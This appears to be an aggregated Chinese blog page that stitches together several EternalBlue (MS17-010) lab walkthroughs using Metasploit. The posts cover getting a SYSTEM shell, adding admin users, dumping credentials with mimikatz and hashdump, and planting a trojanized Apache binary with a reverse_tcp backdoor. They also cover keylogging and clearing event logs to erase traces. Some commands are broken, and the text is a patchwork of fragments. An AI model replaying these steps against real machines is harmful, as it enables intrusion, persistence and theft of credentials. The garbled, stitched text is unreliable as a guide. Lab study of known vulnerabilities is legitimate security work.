精华内容
下载资源
问答
  • 永恒之蓝ms17-010
    千次阅读
    2022-03-27 09:54:42

    永恒之蓝MS17-010漏洞复现

    1.永恒之蓝简介

    ​ 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

    永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。

    2.漏洞原理

    ​ 漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时,在大非分页池(内核的数据结构,Large Non-Paged Kernel Pool)上存在缓冲区溢出。函数srv!SrvOs2FeaListToNt在将FEA list转换成NTFEA(Windows NT FEA) list前会调用srv!SrvOs2FeaListSizeToNt去计算转换后的FEA lsit的大小。然后会进行如下操作:

    • srv!SrvOs2FeaListSizeToNt会计算FEA list的大小并更新待转换的FEA list的大小

    • 因为错误的使用WORD强制类型转换,导致计算出来的待转换的FEA list的大小比真正的FEA list大

    • 因为原先的总大小计算错误,导致当FEA list被转化为NTFEA list时,会在非分页池导致缓冲区溢出

    3 影响版本

    ​ 目前已知受影响的Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0

    4.漏洞环境搭建

    靶机:Windows Server 2008 R2

    攻击机: kali

    5.复现过程

    1.启动靶机

    靶机为Windows Server 2008 R2,ip为192.168.1.128

    2.端口探测

    sudo nmap A -p- -sS sC -T4 -Pn 192.168.1.128
    

    在这里插入图片描述

    探测到靶机开放445端口,而永恒之蓝利用的就是445端口的smb服务,操作系统溢出漏洞

    6.打开MSF进行渗透

    msfconsole
    search  ms17_010
    

    在这里插入图片描述

    use auxiliary/scanner/smb/smb_ms17_010		#进行扫描探测
    set RHOST 192.168.1.128
    run
    

    在这里插入图片描述

    Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2      #表示存在该漏洞
    

    7.使用漏洞模块进行攻击

    use exploit/windows/smb/ms17_010_eternalblue	#设置模块
    set RHOST 192.168.1.128							#设置攻击目标
    

    在这里插入图片描述

    show options		#查看设置情况
    

    在这里插入图片描述

    exploit			#进行攻击
    

    在这里插入图片描述

    查看权限信息

    shell
    

    在这里插入图片描述

    			chcp 65001 解决进入shell中中文乱码
    			whoami/groups  查看我们当前的权限
    			getuid   查看已经获得的权限
    			systeminfo  查看系统信息,以及已打的补丁
    			netstat -an   查看开启端口号
    			net user  username  password /add    windows 中添加用户
    			net localgroup administrators username   /add  把添加的用户添加到管理员组
    			useradd –g 组名 用户名 linux下添加用户到root组
    			
    **使用mimikatz抓取密码**:用于在meterpreter模式下提权为systerm,在32位的进程中比较强大
    
    			(1)在windows 2000 和 windowsxp中无法使用   
    			(2)mimikatz_command -f hash ::
    			(3)kerberos  抓取系统票据
    			(4)wdigest  获取系统账户信息
    	查询域名称:net view /domain
    	查询域内计算机:net view /doamin:xx
    	查询域控制器时间:net time /domain
    	查询域管理用户:net group "domain admins" /domain
    	得到域控制主机名:net group "domain controllers" /domain
    	获取域控主机名:net group "domain controllers" /domain
    
    拿到shell后
    是乱码输入    chcp 65001就好了
    创建一个用户
    net user kkk 123456abc# /add 		#密码不能太简单,否则创建失败
    

    在这里插入图片描述

    8.上传后门

    ps -S httpd.exe
    use payload/windows/x64/meterpreter/reverse_tcp
    set lhost 192.168.1.128
    generate -p Windows -x /root/httpd.exe -k -f exe -o /root/httpd-door.exe
    
    启动一个监听,监听后门的反向连接,并使用 expolit-j 放到后台
    use exploit/multi/handler
    set payload windows/x64/meterpreter/reverse_tcp
    set lhost 192.168.1.128
    exploit -j
    
    切回之前的 meterpreter session,上传后门文件并重命名
    cd c:\\wamp\\bin\\apache\\apache2.2.21\\bin\\
    pwd
    mv httpd.exe httpd.exe.bak
    upload /root/httpd-door.exe
    mv httpd-door.exe httpd.exe
    
    重启 wampapache 服务
    shell
    exit
    
    更多相关内容
  • 永恒之蓝MS17-010,漏洞检测工具
  • MS17-010漏洞扫描工具,在公司,或网吧,机器多的可以直接扫描 可直接输入指定的服务器,或客机扫描
  • 提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生。 该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”...

    目录

    前言:

    准备工作:

    使用kali进行复现:

    使用kali中msf工具查看信息:

     进行信息收集:

     进一步信息收集攻击:

    清除痕迹:

    meterpreter命令大全:


    前言:

    提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生。

    该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播 。勒索病毒肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。最新统计数据显示,100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。 勒索病毒是自熊猫烧香以来影响力最大的病毒之一。

    准备工作:

    需要准备:win7虚拟机和kali虚拟机,且两台虚拟机在同一网段下

    进入win7靶机,win+r打开命令行,输入ipconfig查看win7靶机ip地址

     关闭win7靶机防火墙;

    打开控制面板->系统和安全->windows防火墙->打开或关闭防火墙

    使用kali进行复现:

    打开kali命令行,使用nmap扫描端口,查看端口信息。(445端口打开中)

     打开msf工具

     搜索关于ms17_010模块并调用模块

     查看需要哪些参数  RHOSTS是空的 RPORT445端口 (yes->需要)

     将靶机IP地址设置为攻击地址,开始运行,看到---WIN---代表成功。

    使用kali中msf工具查看信息:

    使用sysinfo命令,查看win7靶机基本信息

     进行信息收集:

    使用getuid命令查看权限;使用ps命令查看当前活跃进程;使用idletime命令查看闲置时间

     进一步信息收集攻击:

    使用screenshot命令将靶机当前屏幕界面截图

     截图保存在root目录下 .jpeg文件

     使用upload /tmp/123.exe  C:\\   命令,上传文件到靶机C盘上(可以上传各种文件)

     使用shell命令,获取shell权限,获取信息

    清除痕迹:

    输入exit退出目标服务器shell

    使用clearev命令,删除日志信息

    使用sessions命令,查看msf连接信息

    使用sessions -K命令,关闭所有msf连接

    安全退出

    meterpreter命令大全:

     在网上查阅了一些资料,整理出来供大家参考

    在其最基本的使用,meterpreter 是一个 Linux 终端在受害者的计算机上。这样,我们的许多基本的Linux命令可以用在meterpreter甚至是在一个窗口或其他操作系统。
    
    这里有一些核心的命令可以用在meterpreter。
    
    ? – 帮助菜单
    background – 将当前会话移动到背景
    bgkill – 杀死一个背景 meterpreter 脚本
    bglist – 提供所有正在运行的后台脚本的列表
    bgrun – 作为一个后台线程运行脚本
    channel – 显示活动频道
    close – 关闭通道
    exit – 终止 meterpreter 会话
    help – 帮助菜单
    interact – 与通道进行交互
    irb – 进入 Ruby 脚本模式
    migrate – 移动到一个指定的 PID 的活动进程
    quit – 终止 meterpreter 会话
    read – 从通道读取数据
    run – 执行以后它选定的 meterpreter 脚本
    use – 加载 meterpreter 的扩展
    write – 将数据写入到一个通道
    
    第2步:文件系统命令
    
    cat -读取并输出到标准输出文件的内容
    cd -更改目录对受害人
    del -删除文件对受害人
    download-从受害者系统文件下载
    edit-用 vim编辑文件
    getlwd -打印本地目录
    getwd -打印工作目录
    lcd -更改本地目录
    lpwd -打印本地目录
    ls -列出在当前目录中的文件列表
    mkdir -在受害者系统上的创建目录
    pwd -输出工作目录
    rm -删除文件
    rmdir -受害者系统上删除目录
    upload-从攻击者的系统往受害者系统上传文件
    
    第 3 步: 网络命令
    
    ipconfig -显示网络接口的关键信息,包括 IP 地址、 等。
    portfwd -端口转发
    route -查看或修改受害者路由表
    
    第 4 步: 系统命令
    
    clearav -清除了受害者的计算机上的事件日志
    drop_token -被盗的令牌
    execute-执行命令
    getpid -获取当前进程 ID (PID)
    getprivs -尽可能获取尽可能多的特权
    getuid -获取作为运行服务器的用户
    kill -终止指定 PID 的进程
    ps -列出正在运行的进程
    reboot-重新启动受害人的计算机
    reg -与受害人的注册表进行交互
    rev2self -在受害者机器上调用 RevertToSelf()
    shell -在受害者计算机上打开一个shell
    shutdown-关闭了受害者的计算机
    steal_token -试图窃取指定的 (PID) 进程的令牌
    sysinfo -获取有关受害者计算机操作系统和名称等的详细信息
    
    第 5 步: 用户界面命令
    
    enumdesktops -列出所有可访问台式机
    getdesktop -获取当前的 meterpreter 桌面
    idletime -检查长时间以来,受害者系统空闲进程
    keyscan_dump -键盘记录软件的内容转储
    keyscan_start -启动时与如 Word 或浏览器的进程相关联的键盘记录软件
    keyscan_stop -停止键盘记录软件
    screenshot-抓去 meterpreter 桌面的屏幕截图
    set_desktop -更改 meterpreter 桌面
    uictl -启用用户界面组件的一些控件
    
    第 6 步: 特权升级命令
    
    getsystem -获得系统管理员权限
    
    第 7 步: 密码转储命令
    
    hashdump -抓去哈希密码 (SAM) 文件中的值
        请注意 hashdump 会可以跳过杀毒软件,但现在有两个脚本,都更加隐蔽,”run hashdump”和”run smart_hashdump”。查找更多关于那些在我即将举行的 meterpreter 脚本作弊。
    
    第 8 步: Timestomp 命令
    
    timestomp -操作修改,访问,并创建一个文件的属性

    展开全文
  • 永恒之蓝MS17-010漏洞利用

    千次阅读 2021-08-20 20:22:49
    永恒之蓝(Eternal Blue) 爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索...

    前言

    永恒之蓝(Eternal Blue) 爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。

    SMB(全称是Server Message Block) 是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。

    Metasploit Framework简介

    MSF(The Metasploit Framework) msf是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。MSF高度模块化,即框架由多个module组成,是全球最受欢迎的渗透测试工具。metasploit涵盖了渗透测试中全过程,你可以在这个框架下利用现有的Payload进行一系列的渗透测试。

    MSF的设计初衷是打造成一个攻击工具开发平台,然而在目前情况下,安全专家以及业余安全爱好者更多地将其当作一种点几下鼠标就可以利用其中附带的攻击工具进行成功攻击的环境。

    Metasploit简介-目录结构
    kali-metasploit框架目录路径:/opt/metasploit-framework/embedded/framework//usr/share/metasploit-framework/

    Metasploit简介-模块
    1.Modules-msf核心:
    用户用到的各种模块几乎都在这里,用户使用use这个msf这里时,就是用到了这个目录下的模块。这个目录下的文件在msfconsole启动时会被自动加载的,如果看到msfconsole启动时有出错信息但又能成功启动可以根据出错信息找解决方法,个人写的Module也可以放在这个目录下。

    2.auxiliary:
    辅助模块,辅助渗透(端口扫描、登录密码爆破、漏洞验证等)

    3.exploits:
    漏洞利用模块,包含主流的漏洞利用脚本,通常是对某些可能存在漏洞的目标进行漏洞利用。命名规则:操作系统/各种应用协议分类

    4.payloads:
    攻击载荷,主要是攻击成功后在目标机器执行的代码,比如反弹shell的代码

    5.post:
    后渗透阶段模块,漏洞利用成功获得meterpreter之后,向目标发送的一些功能性指令,如提权等

    6.evasion:
    躲避模块,用来生成免杀payload

    7.encoders:
    编码器模块,主要包含各种编码工具,对payload进行编码加密,以便绕过入侵检测

    8.nops:
    由于IDS/IPS会检查数据包中不规则的数据,在某些情况下,比如针对溢出攻击,某些特殊滑行字符串(NOPS x90x90…)则会因为被拦截而导致攻击失效。

    MSF使用参考:https://www.jianshu.com/p/1adbabecdcbd

    MSF命令大全:https://www.cnblogs.com/MyGuazi/p/11871420.html

    MS17-010漏洞利用

    靶机win7企业版 ip:192.168.111.128
    攻击机kali ip:192.168.111.130

    我们先在控制台输入msfconsole 启动起来
    在这里插入图片描述
    用msf自带的db_nmap

    db_nmap使用参数:
    -sS: TCP SYN扫描
    -sA: TCP ACK扫描 
    -sT: TCP扫描
    -A:打开操作系统探测和版本探测 
    -T[O-5]:默认为T3,T4表示最大TCP扫描延迟为10ms
    

    db_nmap无法使用参考:https://blog.csdn.net/xujing19920814/article/details/102809014

    db_nmap -sS -T4 192.168.111.128 对目标机器SYN扫描
    在这里插入图片描述

    hosts:查看当前工作区所有主机
    services:查看所有服务
    

    在这里插入图片描述

    发现开放了445端口那么后续就可以进行漏洞利用,使用auxiliary/scanner/smb/smb_ms17_010进行验证是否存在永恒之蓝漏洞
    在这里插入图片描述
    show options 查看参数
    在这里插入图片描述
    设置攻击目标 set rhosts 192.168.111.128 run运行进行扫描
    在这里插入图片描述
    扫描结果:Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7600 x64 (64-bit) 说明可能存在MS17-010这个漏洞

    搜索可使用的模块
    search:搜索msf中相关模块
    search platform:windows cve:2009 type:exploit
    

    search ms17-010这个模块
    在这里插入图片描述
    这里我们选择ms17_010_eternalblue,use exploit/windows/smb/ms17_010_eternalblue
    在这里插入图片描述
    继续查看ms17_010_eternalblue这个模块的参数
    在这里插入图片描述
    设置攻击的ip地址 set rhosts 192.168.111.128 直接run开始攻击
    在这里插入图片描述
    在这里插入图片描述
    攻击成功返回了一个meterpreter会话
    在这里插入图片描述
    在这里插入图片描述

    直接就是系统权限不需要我们提权

    安全修复方案

    关闭445端口。
    打开防火墙,安装安全软件。
    安装对应补丁。
    受影响的系统版本可以参照:https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17-010

    中了勒索病毒可以尝试使用电脑管家的文档解密
    在这里插入图片描述

    展开全文
  • 系统漏洞渗透之永恒之蓝MS17-010

    利用MS17-010漏洞

    1. 我们在Windows7上共享一个文件。
    2. 然后我们要通过445端口来利用这个模块渗透这台Windows7系统
    3. 输入msfconsole 进入控制台终端。
    4. 搜索MS17-010模块的位置。
    5. 找到这个模块,输入这条命令进入。
    6. 输入show option,查看需要配置的一些东西。
    7. 我们这需要设置这几个参数就行了。
    8. 这样我们就进入了“黑客工具”。
    9. 在这里面我们可以做很多事情,我就在这演示一个远程桌面的例子。
    10. 现在Windows7系统是拒绝远程登陆的。
    11. 我现在来开启他,通过这个工具。
    12. 输入这条命令来开启远程登陆。
    13. 在这之前我们可以进入这台电脑的CMD,然后更改这台电脑的密码,从而登陆这台电脑。
    14. 这边显示用户被禁用,但是没关系,我们可以查看他电脑的所有用户,再来更改密码。
    15. 这里有一个yuzai的用户,那我们更改一下这个用户的密码,然后登陆。
    16. 成功进入!
    展开全文
  • 永恒之蓝 MS17-010漏洞复现

    万次阅读 多人点赞 2018-10-07 11:01:17
    永恒之蓝 MS17-010漏洞复现 文章目录永恒之蓝 MS17-010漏洞复现一:漏洞原理1:简介2:漏洞原理代码详解二:漏洞复现1:信息收集 一:漏洞原理 1:简介 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对...
  • windows永恒之蓝ms17-010复现
  • ms17-010漏洞及CobaltStrike会话的转移
  • 永恒之蓝 MS17-010漏洞复现 学好网络安全,保护自己,保护家人
  • 永恒之蓝ms17-010漏洞利用复现

    千次阅读 2022-04-15 21:42:30
    一、永恒之蓝简述: 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日...
  • Windows7 存在 MS17-010 永恒之蓝(远程溢出漏洞) ,该漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码 一、漏洞原理简述 MS17-010漏洞出现在...
  • 永恒之蓝 MS17-010

    2019-11-19 22:19:59
    WIN7系统永恒之蓝漏洞-打开摄像头、录音、视频监控、截屏 前章: 安全漏洞的分析与利用 PTES渗透测试执行标准 1.简介 永恒之蓝:是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击...
  • 永恒之蓝MS17-010

    2019-09-12 19:11:22
    永恒之蓝MS17-010 实验概述   Ms17-010漏洞又称永恒之蓝漏洞,自从EternalBlue这个Exploit被影子经纪人公布到互联网上后,就成为了“明星”。在过去的五月中,这个Exploit被多款恶意软件利用。包括肆虐的...
  • 永恒之蓝 MS17-010 漏洞复现 文章目录永恒之蓝 MS17-010 漏洞复现前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,...
  • 远程代码执行漏洞(MS17-010)加固 1、 漏洞描述 ①SMB协议是一 个通过网络在共享文件、打印设备、命名管道、邮槽之间操作数据的协议。利用该协议,客户端就可以去访问服务器上的共享文件和目录(增删改查)、打印队列和...
  • MS17-010 / EternalBlue(永恒之蓝) 漏洞 检测工具 百度百科: https://baike.baidu.com/item/永恒之蓝 本源码 无调用 任何模块 测试环境: Microsoft Windows XP x86 Microsoft Windows Server 2003 x86 漏洞涉及 ...
  • 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。 二、漏洞复现 准备: 一台关掉了防火墙的的win7(IP地址为192.168.1.101) 一台kalI ...
  • 文章目录 实验目标 实验环境 实验步骤 一、利用Nessus工具扫描靶机漏洞 二、MS17-010漏洞复现(利用MSF框架) 三、在攻击端对靶机进行控制 实验目标 扫描windows靶机漏洞,并使用MSF框架利用漏洞攻击靶机,最后成功...
  • 漏洞复现(一):永恒之蓝ms17-010

    千次阅读 多人点赞 2021-11-02 21:38:47
    永恒之蓝简介 SMB协议 SMB原理 漏洞原理 漏洞危害 漏洞复现 实验环境 完整过程 扫描目标主机是否存在该漏洞 实施攻击 漏洞利用 漏洞防御 永恒之蓝简介 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚...
  • 最近在学习The-Hacker-Playbook-3这本书,书中介绍的红队的第一个核心工具:Metasploit 框架,...对于红队项目,我们可以使用 Metasploit 通过MS17-010永恒之蓝漏洞危害内部系统,以获得我们的第一个内网 shell,或者
  • 永恒之蓝MS17-010

    千次阅读 2021-11-11 23:20:47
    永痕之蓝,微软漏洞编号:MS17-010,该漏洞是由黑客组织Shadow Brokers公布出来的,据江湖传言,该漏洞是美军网络安全部门研制出来的。 该漏洞利用的是windows的smb服务,该漏洞可以直接通过smb服务来获取受害机的...
  • MS17-010:利用微软SMB远程代码执行漏洞,基于端口445 SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等...
  • 永恒之蓝MS17-010)补丁KB号

    千次阅读 2021-12-07 20:03:01
    KB号下载系统补丁地址:Microsoft Update Catalog ... 清单写在前面: KB4012598 KB4012212 KB4013429 KB4013198 KB4012606 补丁地址: Windows XP Windows XP SP3 安全更新程序 (KB4012598) 下载地址 ...
  • 永恒之蓝(ms17-010) 启动meterpreter msfconsole 查询ms17-010,并使用攻击模块 search ms17-010 use 3 设置目标ip,本机ip,payload set rhosts 192.168.254.130 set lhost 192.168.254.129 set ...
  • 永恒之蓝检测工具MS17-010漏洞扫描工具
  • 永恒之蓝漏洞复现(ms17-010)

    千次阅读 2022-04-01 01:07:25
    文章目录前言一、永恒之蓝(Eternal Blue)二、复现环境三、复现过程1.主机发现2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多...
  • 介绍:永恒之蓝利用的 ms17-010 漏洞,拿 Shell、查看文件、获取密码。 0x01、实验环境 攻击机 系统:macOS Sierra 10.12.5 IP:10.211.55.2 靶机 系统:Windows XP SP3 英文版(虚拟机) IP:10.211.55.19...
  • 攻击机:win10 靶机:win7 一:信息收集阶段 ...search ms17-010 (2)探测漏洞可否被利用。这里选择scanner,对目标主机进行扫描。 执行命令:use 3 或者use auxiliary/scanner/smb/smb_ms1.

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 1,994
精华内容 797
关键字:

永恒之蓝ms17-010